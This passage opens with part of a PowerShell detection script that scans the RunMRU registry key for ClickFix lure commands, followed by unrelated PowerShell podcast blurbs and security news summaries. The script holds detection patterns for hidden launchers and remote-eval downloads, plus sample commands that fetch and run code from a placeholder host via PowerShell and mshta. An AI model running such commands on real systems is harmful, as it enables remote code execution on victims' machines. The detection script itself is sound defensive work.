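    [CmdletBinding()]
    param(
        # Constructed sample values for offline use; omit to read the current user's live key.
        [string[]]$SampleValues
    )
    if ($SampleValues) {
        $raw = $SampleValues
    }
    elseif (Test-Path $RunMruKey) {
        $props = Get-ItemProperty -Path $RunMruKey
        # MRUList is the ordering index; the commands themselves sit in single-letter value names.
        $raw = @($props.PSObject.Properties |
            Where-Object { $_.Name -match '^[a-z]$' } |
            ForEach-Object { $_.Value })
    }
    else {
        $raw = @()
    }
    foreach ($value in $raw) {
        $value -replace '\\1$', ''   # drop the "\1" suffix RunMRU appends to every entry
    }
}

function Test-ClickFixCommand {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$Command
    )
    process {
        # The first four are generic "fetch and run something hidden" tells; the last is the lure's
        # own fingerprint, the trailing comment that makes the pasted line look like a CAPTCHA check
        # (wording varies between campaigns, so the pattern is deliberately loose).
        $indicators = [ordered]@{
            HiddenLauncher = '\b(powershell|pwsh)(\.exe)?\b.*\s-(w|win|windowstyle)\s+h(idden)?\b'
            EncodedCommand = '\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}'
            RemoteEval     = '\b(iex|invoke-expression)\b.*\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b|\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b.*\|\s*(iex|invoke-expression)\b'
            MshtaLauncher  = '\bmshta(\.exe)?\s+\S*https?:'
            LureComment    = '#.*(not a robot|verification|captcha|verify)'
        }
        $hits = @(foreach ($name in $indicators.Keys) {
            if ($Command -match $indicators[$name]) { $name }
        })
        # RunMRU is hand-typed history, so even a single indicator deserves a look.
        [pscustomobject]@{
            Suspicious = ($hits.Count -gt 0)
            Indicators = ($hits -join ',')
            Command    = $Command
        }
    }
}

# Constructed sample entries in RunMRU's stored form (the "\1" suffix is real; the commands are made up).
$samples = @(
    'notepad\1'
    'powershell -w hidden -c "iex (irm https://example.invalid/x)" # I am not a robot - reCAPTCHA Verification ID: 1234\1'
    'mshta https://example.invalid/verify.hta\1'
    '\\fileserver\share\1'
)
Get-RunMruCommand -SampleValues $samples | Test-ClickFixCommand | Format-Table -AutoSize
# On a suspect host, call Get-RunMruCommand with no arguments to read the live key instead.
```

With the constructed samples, the second and third entries come back flagged (hidden launcher plus remote eval plus the lure comment, and an mshta download respectively) while the notepad and UNC entries do not. RunMRU is per user, so on a shared machine load the other users' hives or query HKU rather than HKCU, and treat a clean key as absence of evidence only for this one input path.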
In this episode, host Andrew Pla welcomes back Steven Judd, Microsoft MVP, teacher, and longtime community contributor. Together, they dive into the theme of beginnings, from starting careers in IT, to first encounters with PowerShell, and the importance of resilience while navigating the “valley of despair” in learning. Steven shares his journey from music and business studies into technology, where curiosity, persistence, and a willingness to read the manuals shaped his career. The conversation also explores how community, conferences, and friendships have been essential to Steven's growth. From humorous “please clap” moments at Nano Conf to building lasting connections, Steven highlights the power of showing up authentically, persevering through challenges, and helping others along the way. Key Takeaways The Power of the Basics: Learning commands like Get-Command, Get-Help, and Get-Member (“the tripod”) forms the foundation of a strong PowerShell journey. Resilience in Learning: Navigating the “valley of despair” in tough topics like PowerShell, certificates, or regex is where growth happens. Persistence pays off. Community is Everything: From user groups to conferences, surrounding yourself with peers and mentors accelerates growth and helps combat imposter syndrome. Guest Bio Steven Judd is a Microsoft MVP, educator, and veteran PowerShell enthusiast who has been teaching and sharing knowledge in the community for many years. With a background that spans business, music, and IT, Steven brings a unique perspective on learning, resilience, and humor. 
Known for his approachable teaching style and dad jokes, Steven has helped countless professionals embrace automation, improve their skills, and find their place in the PowerShell community. Resource Links Steven Judd's Content Hub: https://shortcutyour.life Steven Judd on YouTube (PowerShell content): YouTube Search Steven Judd on X/Twitter (@StevenJudd): https://x.com/StevenJudd Steven Judd's Merch Store: https://store.stephenjudd.com PDQ Discord: https://discord.gg/PDQ Connect with Andrew: https://andrewpla.tech/links PowerShell Wednesdays (live community sessions): https://www.youtube.com/watch?v=8oesn0HgGxE&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B The PowerShell Podcast on YouTube: https://youtu.be/yu6RVPwp8KY The PowerShell Podcast hub: The PowerShell Podcast: https://pdq.com/the-powershell-podcast
I remember working at a large organization with a team of other IT Operations staffers. We rotated this one job every month amongst a few people, each taking turns, where we'd lose a day to update all the privileged passwords for our servers. This was before Managed Service Accounts and the cloud, when we were required to change these every 30 days and then store the new ones in an encrypted store. What struck me when I got stuck with this wasn't the requirement to change every 30 days; that seemed normal. The thing that bothered me was how manual this was. As a former developer, I wrote some scripts to automate this, pre-PowerShell, and make the task easier on my fellow sys admins. I had scripts to generate a password, change it in AD, then print the pwd to be copied into our secure storage (no API there). This ran in a loop so I didn't lose a whole day to changing passwords. Read the rest of Password Guidance
Microsoft MVP Emanuel Palm joins The PowerShell Podcast to share his journey from managing printers in Sweden to being a Microsoft MVP who is automating the cloud with PowerShell and Azure. He talks about building the AZAuth module for OAuth authentication, using GitHub Actions for CI/CD, and the importance of blogging and community involvement. Plus, Emanuel reveals his unique side hobby... roasting coffee! Key Takeaways From printers to the cloud: Emanuel's career shows how PowerShell can open doors, from automating IT tasks to driving cloud automation and DevOps practices. Community and sharing matter: Blogging, presenting, and contributing help you grow your own understanding while creating opportunities for others. Automation and authentication: With tools like GitHub Actions and his AZAuth module, Emanuel demonstrates how to simplify workflows and securely interact with APIs. Guest Bio Emanuel Palm is a Microsoft MVP based in Sweden, where he is a consultant focused on Microsoft technologies and is active in the PowerShell community. Emanuel is the creator of the AZAuth module, a lightweight solution for handling OAuth authentication in PowerShell, and a frequent speaker at events like PowerShell Conference Europe. Beyond tech, Emanuel is a coffee enthusiast who even roasts his own beans as a side hobby. Resource Links Emanuel's Blog: https://pipe.how GitHub – Emanuel Palm: https://github.com/palmemanuel X / BlueSky: @palmemanuel AZAuth Module on GitHub: https://github.com/PalmEmanuel/AzAuth Emanuel's PS Wednesday: https://www.youtube.com/watch?v=trP2LLDynA0 Arkanum Coffee (Emanuel's hobby project): https://arkanum.coffee PDQ Discord: https://discord.gg/pdq Connect with Andrew: https://andrewpla.tech/links The PowerShell Podcast on YouTube: https://youtu.be/-uHHGVH1Kcc The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
James Brundage returns to The PowerShell Podcast to talk about his new project, Turtle, which brings the classic concept of Turtle graphics into PowerShell. From simple shapes to fractals, animations, and more, James shows how PowerShell can be a powerful and fun tool for exploring programming concepts. Tune in for insights on the history of Turtle, its modern applications, and how it can inspire both new learners and seasoned pros. Guest Bio: James Brundage is a Microsoft MVP who has been heavily involved in PowerShell for over 18 years. He is a former member of the PowerShell team, working there during v2 and v3. He now works as a consultant with Start-Automating, applying his PowerShell expertise to organizations to help solve large-scale problems all around the world. He also has a lot of great projects on GitHub and regularly shares his knowledge at user groups and conferences. Resource Links: PSTurtle Project & Documentation: https://psturtle.com/ GitHub – Start-Automating: https://github.com/StartAutomating James Brundage on BlueSky (@MrPowerShell): https://bsky.app/profile/mrpowershell.com MrPowerShell.com: https://mrpowershell.com/ PowerShell Web Organization (for PowerShell + Web projects): https://github.com/PowerShellWeb Turtles in PowerShell talk: https://www.youtube.com/watch?v=o8l_bQRvMkg Follow Andrew: https://andrewpla.tech/links Join the PDQ Discord: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/oGG6bKXsdrg The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
Maxime Lamothe-Brassard, Founder and CEO of LimaCharlie, and the Defender Fridays community sit down with Jared Atkinson and dive into BloodHound. Jared is a security researcher who specializes in Digital Forensics and Incident Response. Recently, he has been building and leading private sector Hunt Operations capabilities. In his previous life, Jared led incident response missions for the U.S. Air Force Hunt Team, detecting and removing Advanced Persistent Threats on Air Force and DoD networks. Passionate about PowerShell and the open source community, Jared is the lead developer of PowerForensics, Uproot, and maintains a DFIR focused blog at www.invoke-ir.com. On Defender Fridays we delve into the dynamic world of information security, exploring its defensive side with seasoned professionals from across the industry. Our aim is simple yet ambitious: to foster a collaborative space where ideas flow freely, experiences are shared, and knowledge expands. Join the live discussions by registering at https://limacharlie.io/defender-fridays
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Interesting Technique to Launch a Shellcode Xavier came across malware that uses PowerShell and the CallWindowProcA() API to launch shellcode: the buffer holding the code is passed as the window-procedure pointer, so the API itself transfers control into it without the script ever calling the buffer directly. https://isc.sans.edu/diary/Interesting%20Technique%20to%20Launch%20a%20Shellcode/32238 NX Compromised to Steal Wallets and Credentials The popular open source NX build package was compromised. Code was added that uses AI tools such as Claude and Gemini to find and steal credentials from affected systems. https://semgrep.dev/blog/2025/security-alert-nx-compromised-to-steal-wallets-and-credentials/ Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed the Global Espionage System Several law enforcement and cybersecurity agencies worldwide collaborated to release a detailed report on the recent Salt Typhoon activity. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a
In this episode of the PowerShell Podcast, we're live from TechMentor at the Microsoft campus with two incredible guests: longtime advocate, educator, and PM on the PowerShell team at Microsoft - Jason Helmick and newcomer Troy Brown. This special episode captures the heart of community, innovation, and the transformative power of PowerShell—from seasoned insight to beginner breakthroughs. Jason drops serious knowledge on two game-changing technologies: AI Shell: Think ChatGPT, but built directly into your terminal. Learn how it enhances shell UX, assists with command building, explains parameters, and keeps you focused without switching contexts. DSC v3 (Desired State Configuration): Now fully cross-platform and decoupled from PowerShell, DSC v3 is lighter, more extensible, and suitable for everything from servers to IoT. Jason walks us through the evolution, real-world use cases (like flipping Windows from dark mode to light mode!), and what's next for the configuration platform. Highlights: Microsoft's hidden campus lore, including a piece of the Berlin Wall! 
The evolution of PowerShell ReadLine and its impact on productivity AI Shell's support for OpenAI, Azure Copilot, ollama, Gemini, and even custom agents Exporting configs from existing machines—a long-awaited DSC feature Why DSC v3 might be the most developer- and sysadmin-friendly release yet The cultural backbone of the PowerShell team: being “scrappy” and driven by customer success Troy Brown's First TechMentor Experience First-time conference-goer Troy Brown shares his experience diving into PowerShell: How a PowerShell workshop with Sean Wheeler, Steven Judd, and Jason Helmick helped him finally understand modules The journey from using PDQ to push basic PowerShell scripts to deeper automation potential Navigating the learning curve with community support His message to fellow newcomers: “Don't take things personally, and embrace the journey.” Resource Links: DSC v3 on GitHub Leanpub DSC v3 Book by Gijs https://leanpub.com/thedscv3handbook The Phoenix Project (book) (a must-read for IT pros) https://www.amazon.com/Phoenix-Project-DevOps-Helping-Business/dp/0988262592 https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/_f5oYxzkinI The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast
In this episode, Andrew catches up with Sean Wheeler and James Petty live from TechMentor. What starts as casual conversation about conference camaraderie turns into a rich discussion on learning PowerShell, building effective profiles, AI-assisted scripting, module recommendations, and what's next for the PowerShell Summit. Whether you're new to PowerShell or a seasoned scripter, this episode offers insights, laughs, and actionable advice. Plus, we finally settle (sort of) whether the VS Code sidebar belongs on the left or the right. Key Takeaways You don't need to learn everything. Just understand the ecosystem and build your learning map. Create your PowerShell profile now—it's an easy win with huge productivity returns. AI is a tool, not a crutch. Use it wisely and validate the results. Get involved in the community. It will accelerate your learning and broaden your opportunities. Shoutouts & Links https://powershell.org https://www.youtube.com/c/PowerShellOrg https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/hr59kahksIM
In this high-energy episode, returning guests Gilbert Sanchez and Jake Hildreth join Andrew for a deep dive into: Module templating with PSStucco Building for accessibility in PowerShell Creating open source GitHub orgs like PSInclusive How PowerShell can lead to learning modern dev workflows like GitHub Actions and CI/CD What begins with a conversation about a live demo gone hilariously sideways turns into an insightful exploration of how PowerShell acts as a launchpad into bigger ecosystems like GitHub, YAML, JSON, and continuous integration pipelines. Bios: Gilbert Sanchez is a Staff Software Development Engineer at Tesla, specifically working on PowerShell. Formerly known as "Señor Systems Engineer" at Meta. A loud advocate for DEI, DevEx, DevOps, and TDD. Jake Hildreth is a Principal Security Consultant at Semperis, Microsoft MVP, and longtime builder of tools that make identity security suck a little less. With nearly 25 years in IT (and the battle scars to prove it), he specializes in helping orgs secure Active Directory and survive the baroque disaster that is Active Directory Certificate Services. He's the creator of Locksmith, BlueTuxedo, and PowerPUG!, open-source tools built to make life easier for overworked identity admins. When he's not untangling Kerberos or wrangling DNS, he's usually hanging out with his favorite people and most grounding reality check: his wife and daughter. Links https://gilbertsanchez.com/posts/stucco-create-powershell-module/ https://jakehildreth.github.io/blog/2025/07/02/PowerShell-Module-Scaffolding-with-PSStucco.html https://github.com/PSInclusive https://jakehildreth.com/ https://andrewpla.tech/links https://discord.gg/pdq https://pdq.com/podcast https://youtu.be/w-z2-0ii96Y
Today we are joined by Selena Larson, Threat Researcher at Proofpoint, and co-host of Only Malware in the Building, as she discusses their work on "Amatera Stealer - Rebranded ACR Stealer With Improved Evasion, Sophistication." Proofpoint researchers have identified Amatera Stealer, a rebranded and actively developed malware-as-a-service (MaaS) variant of the former ACR Stealer, featuring advanced evasion techniques like NTSockets for stealthy C2 communication and WoW64 Syscalls to bypass user-mode defenses. Distributed via ClearFake web injects and the ClickFix technique, Amatera leverages multilayered PowerShell loaders, blockchain-based hosting, and creative social engineering to compromise victims. With enhanced capabilities to steal browser data, crypto wallets, and other sensitive files, Amatera poses a growing threat in the wake of disruptions to competing stealers like Lumma. Complete our annual audience survey before August 31. The research can be found here: Amatera Stealer: Rebranded ACR Stealer With Improved Evasion, Sophistication